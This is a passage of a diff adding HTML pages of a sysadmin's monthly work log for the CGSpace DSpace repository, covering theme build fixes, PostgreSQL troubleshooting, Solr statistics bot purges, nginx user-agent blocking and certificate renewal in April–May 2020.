+<li>They asked if I am using the <code>JAVA_OPTS=-Dfile.encoding=UTF-8</code> when building DSpace and running Tomcat</li>
+<li>I set it explicitly for Maven and Ant just now (and cleared all XMLUI caches) but the issue is still there</li>
+<li>I asked them if they are building on macOS or Linux, and which Node.js version (I&rsquo;m using 10.20.1, which is the current LTS branch).</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-04-25">2020-04-25</h2>
+<ul>
+<li>I researched a bit more about the Â issue with glypicons and realized it&rsquo;s due to <a href="https://github.com/twbs/bootstrap-sass/issues/919">a bug in libsass</a>
+<ul>
+<li>I have Ruby sass version 3.4.25 installed in my local environment, but DSpace Mirage 2 is supposed to build with 3.3.14</li>
+<li>Downgrading the version fixes it, though I wonder: why did I not have this issue on the <code>6.x-dev</code> branch before Atmire&rsquo;s pull request, and also on <code>5_x-prod</code> where I&rsquo;ve been building for a few months here&hellip;</li>
+</ul>
+</li>
+<li>I deployed the latest <code>5_x-prod</code> branch on CGSpace (linode18), ran all updates, and rebooted the server
+<ul>
+<li>This includes the &ldquo;COVID19&rdquo; ILRI subject, the new CCAFS Phase II project tags, and the changes to an ILRI author name</li>
+<li>After restarting the server I had to restart Tomcat three times before all Solr statistics cores loaded properly.</li>
+<li>After that I started a full Discovery reindexing to pick up some author changes I made last week:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
+$ time chrt -i 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+</code></pre><ul>
+<li>I ran the <code>dspace cleanup -v</code> process on CGSpace and got an error:</li>
+</ul>
+<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
+  Detail: Key (bitstream_id)=(184980) is still referenced from table &#34;bundle&#34;.
+</code></pre><ul>
+<li>The solution is, as always:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -d dspace -U dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (183996);&#39;
+UPDATE 1
+</code></pre><ul>
+<li>I spent some time working on the XMLUI themes in DSpace 6
+<ul>
+<li>Atmire&rsquo;s pull request modifies <code>pom.xml</code> to <em>not</em> exclude <code>node_modules</code>, which means an extra ~260,000 files get copied to our installation folder because of all the themes</li>
+<li>I worked on the <code>Gruntfile.js</code> to copy Font Awesome and Bootstrap glyphicon fonts out of <code>node_modules</code> and into <code>fonts</code> at build time, but still <code>jquery-ui.min.css</code> was being referenced as a <code>url()</code> in CSS</li>
+<li>SASS can include imported CSS in your compiled CSS—instead of including an <code>@import url(..)</code> if you import it without the &ldquo;.css&rdquo;, but our version of Ruby SASS doesn&rsquo;t support that</li>
+<li>I hacked <code>Gruntfile.js</code> to use <code>dart-sass</code> instead of Ruby <code>compass</code> (including installing compass&rsquo;s mixins via npm!) but then <a href="https://github.com/sass/dart-sass/issues/345">dart-sass converts all the glyphicon ASCII escape codes to Unicode literals</a> and they show up garbled in Firefox</li>
+<li>I tried to use <code>node-sass</code> instead of dart-sass and it doesn&rsquo;t replace the ASCII escapes with literals, but then I get the the Â issue with the glyphicon in the header trail again! Back to square one!</li>
+<li>So that was a waste of five hours&hellip;</li>
+<li>I might just leave this <a href="https://github.com/twbs/bootstrap-sass/issues/919">tiny hack</a> in <code>0_CGIAR/styles/_style.scss</code> to override this and be done with it:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>.breadcrumb &gt; li + li:before {
+  content: &#34;/\00a0&#34;;
+}
+</code></pre><h2 id="2020-04-27">2020-04-27</h2>
+<ul>
+<li>File an issue on DSpace Jira about the <a href="https://jira.lyrasis.org/browse/DS-4492"><code>mvn clean</code> task not removing the Mirage 2 target directory</a></li>
+<li>My changes to DSpace XMLUI Mirage 2 build process mean that we don&rsquo;t need Ruby gems at all anymore! We can completely build without them!</li>
+<li>Trying to test the <code>com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI</code> script but there is an error:</li>
+</ul>
+<pre tabindex="0"><code>Exception: org.apache.solr.search.SyntaxError: Cannot parse &#39;cua_version:${cua.version.number}&#39;: Encountered &#34; &#34;}&#34; &#34;} &#34;&#34; at line 1, column 32.
+Was expecting one of:
+    &#34;TO&#34; ...
+    &lt;RANGE_QUOTED&gt; ...
+    &lt;RANGE_GOOP&gt; ...
+</code></pre><ul>
+<li>Seems something is wrong with the variable interpolation, and I see two configurations in the <code>atmire-cua.cfg</code> file:</li>
+</ul>
+<pre tabindex="0"><code>atmire-cua.cua.version.number=${cua.version.number}
+atmire-cua.version.number=${cua.version.number}
+</code></pre><ul>
+<li>I sent a message to Atmire to check</li>
+</ul>
+<h2 id="2020-04-28">2020-04-28</h2>
+<ul>
+<li>I did some work on DSpace 6 to modify our XMLUI theme to use Font Awesome icons via SVG + JavaScript instead of using web fonts
+<ul>
+<li>The difference is about 105K less, plus two fewer network requests since we don&rsquo;t need the web fonts anymore</li>
+<li>Before:
+<ul>
+<li><code>scripts/theme.js</code>: 654K</li>
+<li><code>styles/main.css</code>: 220K</li>
+<li><code>fa-brands-400.woff2</code>: 75K</li>
+<li><code>fa-solid-900.woff2</code>: 78K</li>
+<li>Total: 1027K</li>
+</ul>
+</li>
+<li>After:
+<ul>
+<li><code>scripts/theme.js</code>: 704K</li>
+<li><code>styles/main.css</code>: 218K</li>
+<li>Total: 922K</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>I manually edited the CUA version variable and was then able to run the <code>com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI</code> script
+<ul>
+<li>On the first run it took one hour to process 100,000 records on my local test instance&hellip;</li>
+<li>On the second run it took one hour to process 140,000 records</li>
+<li>On the third run it took one hour to process 150,000 records</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-04-29">2020-04-29</h2>
+<ul>
+<li>I found out that running the Atmire CUA script with more memory and a larger number of records (-r 20000) makes it run faster
+<ul>
+<li>Now the process finishes, but there are errors on some records:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>Record uid: ee085cc0-0110-42c5-80b9-0fad4015ed9f couldn&#39;t be processed
+com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: ee085cc0-0110-42c5-80b9-0fad4015ed9f, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(AtomicStatisticsUpdater.java:304)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(AtomicStatisticsUpdater.java:176)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(AtomicStatisticsUpdater.java:161)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(AtomicStatisticsUpdater.java:128)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(AtomicStatisticsUpdateCLI.java:78)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+Caused by: java.lang.NullPointerException
+        at com.atmire.dspace.cua.CUADSOServiceImpl.findByLegacyID(CUADSOServiceImpl.java:40)
+        at com.atmire.statistics.util.update.atomic.processor.AtomicUpdateProcessor.getDSpaceObject(AtomicUpdateProcessor.java:49)
+        at com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor.process(ContainerOwnerDBProcessor.java:45)
+        at com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor.visit(ContainerOwnerDBProcessor.java:38)
+        at com.atmire.statistics.util.update.atomic.record.UsageRecord.accept(UsageRecord.java:23)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(AtomicStatisticsUpdater.java:301)
+        ... 10 more
+</code></pre><ul>
+<li>I&rsquo;ve sent a message to Atmire to ask for advice</li>
+<li>Also, now I can actually see the CUA statlets and usage statistics
+<ul>
+<li>Unfortunately it seems they are using Font Awesome 4 in their CUA module and this means that some icons are broken because the names have changed, but also some of their code is using Unicode characters instead of classes in spans!</li>
+<li>I&rsquo;ve reverted my sweet SVG work from yesterday and adjusted the Font Awesome 5 SCSS to add a few more icons that they are using</li>
+</ul>
+</li>
+<li>Tezira said she was having issues submitting items on CGSpace today
+<ul>
+<li>I looked at all the errors in the DSpace log and see a few SQL pooling errors around mid day:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ grep ERROR dspace.log.2020-04-29 | cut -f 3- -d&#39; &#39; | sort | uniq -c | sort -n
+      1 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL findByUnique Error -
+      1 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL find Error -
+      1 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL query singleTable Error -
+      1 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
+</code></pre><ul>
+<li>I looked in Munin and I see that there is a strange spike in the database pool usage this afternoon:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/04/jmx_tomcat_dbpools-day.png" alt="Tomcat Database Pool usage day"></p>
+<ul>
+<li>Looking at the past month it does seem to be something strange:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/04/jmx_tomcat_dbpools-month.png" alt="Tomcat Database Pool usage month"></p>
+<ul>
+<li>Database connections do seem high:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
+      5 dspaceApi
+      6 dspaceCli
+     88 dspaceWeb
+</code></pre><ul>
+<li>Most of those are idle in transaction:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep &#39;dspaceWeb&#39; | grep -c &#34;idle in transaction&#34;
+67
+</code></pre><ul>
+<li>I don&rsquo;t see anything in the PostgreSQL or Tomcat logs suggesting anything is wrong&hellip; I think the solution to clear these idle connections is probably to just restart Tomcat</li>
+<li>I looked at the Solr stats for this month and see lots of suspicious IPs:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=*:*&amp;fq=dateYearMonth:2020-04&amp;rows=0&amp;wt=json&amp;indent=true&amp;facet=true&amp;facet.field=ip
+
+        &#34;88.99.115.53&#34;,23621, # Hetzner, using XMLUI and REST API with no user agent
+        &#34;104.154.216.0&#34;,11865,# Google cloud, scraping XMLUI with no user agent
+        &#34;104.198.96.245&#34;,4925,# Google cloud, using REST API with no user agent
+        &#34;52.34.238.26&#34;,2907,  # EcoSearch on XMLUI, user agent: EcoSearch (+https://search.ecointernet.org/)
+</code></pre><ul>
+<li>And a bunch more&hellip; ugh&hellip;
+<ul>
+<li>70.32.90.172: scraping REST API for IWMI/WLE pages with no user agent</li>
+<li>2a01:7e00::f03c:91ff:fe16:fcb: Linode, REST API, no user agent</li>
+<li>2607:f298:5:101d:f816:3eff:fed9:a484: DreamHost, XMLUI and REST API, python-requests/2.18.4</li>
+<li>2a00:1768:2001:7a::20: Netherlands, XMLUI, trying SQL injections</li>
+</ul>
+</li>
+<li>I need to start blocking requests without a user agent&hellip;</li>
+<li>I purged these user agents using my <code>check-spider-ip-hits.sh</code> script:</li>
+</ul>
+<pre tabindex="0"><code>$ for year in {2010..2019}; do ./check-spider-ip-hits.sh -f /tmp/ips -s statistics-$year -p; done
+$ ./check-spider-ip-hits.sh -f /tmp/ips -s statistics -p
+</code></pre><ul>
+<li>Then I added a few of them to the bot mapping in the nginx config because it appears they are regular harvesters since 2018</li>
+<li>Looking through the Solr stats faceted by the <code>userAgent</code> field I see some interesting ones:</li>
+</ul>
+<pre tabindex="0"><code>$ curl &#39;http://localhost:8081/solr/statistics/select?q=*%3A*&amp;rows=0&amp;wt=json&amp;indent=true&amp;facet=true&amp;facet.field=userAgent&#39;
+...
+&#34;Delphi 2009&#34;,50725,
+&#34;OgScrper/1.0.0&#34;,12421,
+</code></pre><ul>
+<li>Delphi is only used by IP addresses in Greece, so that&rsquo;s obviously the GARDIAN people harvesting us&hellip;</li>
+<li>I have no idea what OgScrper is, but it&rsquo;s not a user!</li>
+<li>Then there are 276,000 hits from <code>MEL-API</code> from Jordanian IPs in 2018, so that&rsquo;s obviously CodeObia guys&hellip;</li>
+<li>Other user agents:
+<ul>
+<li>GigablastOpenSource/1</li>
+<li>Owlin Domain Resolver V1</li>
+<li>API scraper</li>
+<li>MetaURI</li>
+</ul>
+</li>
+<li>I don&rsquo;t know why, but my <code>check-spider-hits.sh</code> script doesn&rsquo;t seem to be handling the user agents with spaces properly so I will delete those manually after</li>
+<li>First delete the ones without spaces, creating a temp file in <code>/tmp/agents</code> containing the patterns:</li>
+</ul>
+<pre tabindex="0"><code>$ for year in {2010..2019}; do ./check-spider-hits.sh -f /tmp/agents -s statistics-$year -p; done
+$ ./check-spider-hits.sh -f /tmp/agents -s statistics -p
+</code></pre><ul>
+<li>That&rsquo;s about 300,000 hits purged&hellip;</li>
+<li>Then remove the ones with spaces manually, checking the query syntax first, then deleting in yearly cores and the statistics core:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/select&#34; -d &#34;q=userAgent:/Delphi 2009/&amp;rows=0&#34;
+...
+&lt;lst name=&#34;responseHeader&#34;&gt;&lt;int name=&#34;status&#34;&gt;0&lt;/int&gt;&lt;int name=&#34;QTime&#34;&gt;52&lt;/int&gt;&lt;lst name=&#34;params&#34;&gt;&lt;str name=&#34;q&#34;&gt;userAgent:/Delphi 2009/&lt;/str&gt;&lt;str name=&#34;rows&#34;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&#34;response&#34; numFound=&#34;38760&#34; start=&#34;0&#34;&gt;&lt;/result&gt;
+$ for year in {2010..2019}; do curl -s &#34;http://localhost:8081/solr/statistics-$year/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;userAgent:&#34;Delphi 2009&#34;&lt;/query&gt;&lt;/delete&gt;&#39;; done
+$ curl -s &#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;userAgent:&#34;Delphi 2009&#34;&lt;/query&gt;&lt;/delete&gt;&#39;
+</code></pre><ul>
+<li>Quoting them works for now until I can look into it and handle it properly in the script</li>
+<li>This was about 400,000 hits in total purged from the Solr statistics</li>
+</ul>
+<h2 id="2020-04-30">2020-04-30</h2>
+<ul>
+<li>The TLS certificates on DSpace Test (linode26) have not been renewing correctly
+<ul>
+<li>The log shows the message &ldquo;No renewals were attempted&rdquo;</li>
+<li>The <code>certbot-auto certificates</code> command doesn&rsquo;t list the certificate I have installed</li>
+<li>I guess this is because I copied it from the previous server&hellip;</li>
+<li>I moved the Let&rsquo;s Encrypt directory, got a new cert, then revoked the old one:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># mv /etc/letsencrypt /etc/letsencrypt.bak
+# /opt/certbot-auto certonly --standalone --email fu@m.com -d dspacetest.cgiar.org --standalone --pre-hook &#34;/bin/systemctl stop nginx&#34; --post-hook &#34;/bin/systemctl start nginx&#34;
+# /opt/certbot-auto revoke --cert-path /etc/letsencrypt.bak/live/dspacetest.cgiar.org/cert.pem
+# rm -rf /etc/letsencrypt.bak
+</code></pre><ul>
+<li>Run all system updates on DSpace Test and reboot it</li>
+<li>Tezira is still having issue submitting to CGSpace and the database is definitely busy according to Munin:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/04/postgres_connections_cgspace-week.png" alt="Tomcat postgres connections week"></p>
+<ul>
+<li>But I don&rsquo;t see a lot of connections in PostgreSQL itself:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
+      5 dspaceApi
+      6 dspaceCli
+     14 dspaceWeb
+$ psql -c &#39;select * from pg_stat_activity&#39; | wc -l
+30
+</code></pre><ul>
+<li>Tezira said she cleared her browser cache and then was able to submit again
+<ul>
+<li>She said once she logged back in she had very many &ldquo;Untitled&rdquo; submissions pending</li>
+<li>I see that the database connections are indeed much lower now:</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2020/04/postgres_connections_cgspace-day.png" alt="Tomcat postgres connections week"></p>
+<ul>
+<li>The PostgreSQL log shows a lot of errors about deadlocks and queries waiting on other processes&hellip;</li>
+</ul>
+<pre tabindex="0"><code>ERROR:  deadlock detected
+</code></pre><!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2020-05/index.html b/docs/2020-05/index.html
new file mode 100644
index 000000000..5d68b030d
--- /dev/null
+++ b/docs/2020-05/index.html
@@ -0,0 +1,531 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="May, 2020" />
+<meta property="og:description" content="2020-05-02
+
+Peter said that CTA is having problems submitting an item to CGSpace
+
+Looking at the PostgreSQL stats it seems to be the same issue that Tezira was having last week, as I see the number of connections in &lsquo;idle in transaction&rsquo; and &lsquo;waiting for lock&rsquo; state are increasing again
+I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2.11, and there were some bugs related to transactions fixed in 42.2.12 (which I had updated in the Ansible playbooks, but not deployed yet)
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2020-05/" />
+<meta property="article:published_time" content="2020-05-02T09:52:04+03:00" />
+<meta property="article:modified_time" content="2020-06-01T13:55:08+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="May, 2020"/>
+<meta name="twitter:description" content="2020-05-02
+
+Peter said that CTA is having problems submitting an item to CGSpace
+
+Looking at the PostgreSQL stats it seems to be the same issue that Tezira was having last week, as I see the number of connections in &lsquo;idle in transaction&rsquo; and &lsquo;waiting for lock&rsquo; state are increasing again
+I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2.11, and there were some bugs related to transactions fixed in 42.2.12 (which I had updated in the Ansible playbooks, but not deployed yet)
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "May, 2020",
+  "url": "https://alanorth.github.io/cgspace-notes/2020-05/",
+  "wordCount": "2154",
+  "datePublished": "2020-05-02T09:52:04+03:00",
+  "dateModified": "2020-06-01T13:55:08+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2020-05/">
+
+    <title>May, 2020 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-05/">May, 2020</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2020-05-02T09:52:04+03:00">Sat May 02, 2020</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-05-02">2020-05-02</h2>
+<ul>
+<li>Peter said that CTA is having problems submitting an item to CGSpace
+<ul>
+<li>Looking at the PostgreSQL stats it seems to be the same issue that Tezira was having last week, as I see the number of connections in &lsquo;idle in transaction&rsquo; and &lsquo;waiting for lock&rsquo; state are increasing again</li>
+<li>I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2.11, and there were some bugs related to transactions fixed in 42.2.12 (which I had updated in the Ansible playbooks, but not deployed yet)</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-05-03">2020-05-03</h2>
+<ul>
+<li>Purge a few remaining bots from CGSpace Solr statistics that I had identified a few months ago
+<ul>
+<li><code>lua-resty-http/0.10 (Lua) ngx_lua/10000</code></li>
+<li><code>omgili/0.5 +http://omgili.com</code></li>
+<li><code>IZaBEE/IZaBEE-1.01 (Buzzing Abound The Web; https://izabee.com; info at izabee dot com)</code></li>
+<li><code>Twurly v1.1 (https://twurly.org)</code></li>
+<li><code>Pattern/2.6 +http://www.clips.ua.ac.be/pattern</code></li>
+<li><code>CyotekWebCopy/1.7 CyotekHTTP/2.0</code></li>
+</ul>
+</li>
+<li>This is only about 2,500 hits total from the last ten years, and half of these bots no longer seem to exist, so I won&rsquo;t bother submitting them to the COUNTER-Robots project</li>
+<li>I noticed that our custom themes were incorrectly linking to the OpenSearch XML file
+<ul>
+<li>The bug <a href="https://jira.lyrasis.org/browse/DS-2592">was fixed</a> for Mirage2 in 2015</li>
+<li>Note that this did not prevent OpenSearch itself from working</li>
+<li>I will patch this on our DSpace 5.x and 6.x branches</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-05-06">2020-05-06</h2>
+<ul>
+<li>Atmire responded asking for more information about the Solr statistics processing bug in CUA so I sent them some full logs
+<ul>
+<li>Also I asked again about the Maven variable interpolation issue for <code>cua.version.number</code>, and if they would be willing to upgrade CUA to use Font Awesome 5 instead of 4.</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-05-07">2020-05-07</h2>
+<ul>
+<li>Linode sent an alert that there was high CPU usage on CGSpace (linode18) early this morning
+<ul>
+<li>I looked at the nginx logs using goaccess and I found a few IPs making lots of requests around then:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;07/May/2020:(01|03|04)&#34; | goaccess --log-format=COMBINED -
+</code></pre><ul>
+<li>The two main IPs making requests around then are 188.134.31.88 and 212.34.8.188
+<ul>
+<li>The first is in Russia and it is hitting mostly XMLUI Discover links using <em>dozens</em> of different user agents, a total of 20,000 requests this week</li>
+<li>The second IP is CodeObia testing AReS, a total of 171,000 hits this month</li>
+<li>I will purge both of those IPs from the Solr stats using my <code>check-spider-ip-hits.sh</code> script:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ ./check-spider-ip-hits.sh -f /tmp/ips -s statistics -p
+Purging 171641 hits from 212.34.8.188 in statistics
+Purging 20691 hits from 188.134.31.88 in statistics
+
+Total number of bot hits purged: 192332
+</code></pre><ul>
+<li>And then I will add 188.134.31.88 to the nginx bad bot list and tell CodeObia to please use a &ldquo;bot&rdquo; user agent</li>
+<li>I also changed the nginx config to block requests with blank user agents</li>
+</ul>
+<h2 id="2020-05-11">2020-05-11</h2>
+<ul>
+<li>Bizu said she was having issues submitting to CGSpace last week
+<ul>
+<li>The issue sounds like the one Tezira and CTA were having in the last few weeks</li>
+<li>I looked at the PostgreSQL graphs and see there are a lot of connections in &ldquo;idle in transaction&rdquo; and &ldquo;waiting for lock&rdquo; state:</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2020/05/postgres_connections_cgspace-week.png" alt="PostgreSQL connections"></p>
+<ul>
+<li>I think I&rsquo;ll downgrade the PostgreSQL JDBC driver from 42.2.12 to 42.2.10, which was the version we were using before these issues started happening</li>
+<li>Atmire sent some feedback about my ongoing issues with their CUA module, but none of it was conclusive yet
+<ul>
+<li>Regarding Font Awesome 5 they will check how much work it will take and give me a quote</li>
+</ul>
+</li>
+<li>Abenet said some users are questioning why the statistics dropped so much lately, so I made a <a href="https://www.yammer.com/dspacedevelopers/#/Threads/show?threadId=674923030216704">post to Yammer</a> to explain about the robots</li>
+<li>Last week Peter had asked me to add a new ILRI author&rsquo;s ORCID iD
+<ul>
+<li>I added it to the controlled vocabulary and tagged the user&rsquo;s existing ~11 items in CGSpace using this CSV file with my <code>add-orcid-identifiers-csv.py</code> script:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ cat 2020-05-11-add-orcids.csv
+dc.contributor.author,cg.creator.id
+&#34;Lutakome, P.&#34;,&#34;Pius Lutakome: 0000-0002-0804-2649&#34;
+&#34;Lutakome, Pius&#34;,&#34;Pius Lutakome: 0000-0002-0804-2649&#34;
+$ ./add-orcid-identifiers-csv.py -i 2020-05-11-add-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -d
+</code></pre><ul>
+<li>Run system updates on CGSpace (linode18) and reboot it
+<ul>
+<li>I had to restart Tomcat five times before all Solr statistics cores came up OK, ugh.</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-05-12">2020-05-12</h2>
+<ul>
+<li>Peter noticed that CGSpace is no longer on AReS, because I blocked all requests that don&rsquo;t specify a user agent
+<ul>
+<li>I&rsquo;ve temporarily disabled that restriction and asked Moayad to look into how he can specify a user agent in the AReS harvester</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-05-13">2020-05-13</h2>
+<ul>
+<li>Atmire responded about Font Awesome and said they can switch to version 5 for 16 credits
+<ul>
+<li>I told them to go ahead</li>
+</ul>
+</li>
+<li>Also, Atmire gave me a small workaround for the <code>cua.version.number</code> interpolation issue and said they would look into the crash that happens when processing our Solr stats</li>
+<li>Run system updates and reboot AReS server (linode20) for the first time in almost 100 days
+<ul>
+<li>I notice that AReS now has some of CGSpace&rsquo;s data in it (but not all) since I dropped the user-agent restriction on the REST API yesterday</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-05-17">2020-05-17</h2>
+<ul>
+<li>Create an issue in the OpenRXV project for Moayad to change the default harvester user agent (<a href="https://github.com/ilri/OpenRXV/issues/36">#36</a>)</li>
+</ul>
+<h2 id="2020-05-18">2020-05-18</h2>
+<ul>
+<li>Atmire responded and said they still can&rsquo;t figure out the CUA statistics issue, though they seem to only be trying to understand what&rsquo;s going on using static analysis
+<ul>
+<li>I told them that they should try to run the code with the Solr statistics that I shared with them a few weeks ago</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-05-19">2020-05-19</h2>
+<ul>
+<li>Add ORCID identifier for Sirak Bahta
+<ul>
+<li>I added it to the controlled vocabulary and tagged the user&rsquo;s existing ~40 items in CGSpace using this CSV file with my <code>add-orcid-identifiers-csv.py</code> script:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ cat 2020-05-19-add-orcids.csv
+dc.contributor.author,cg.creator.id
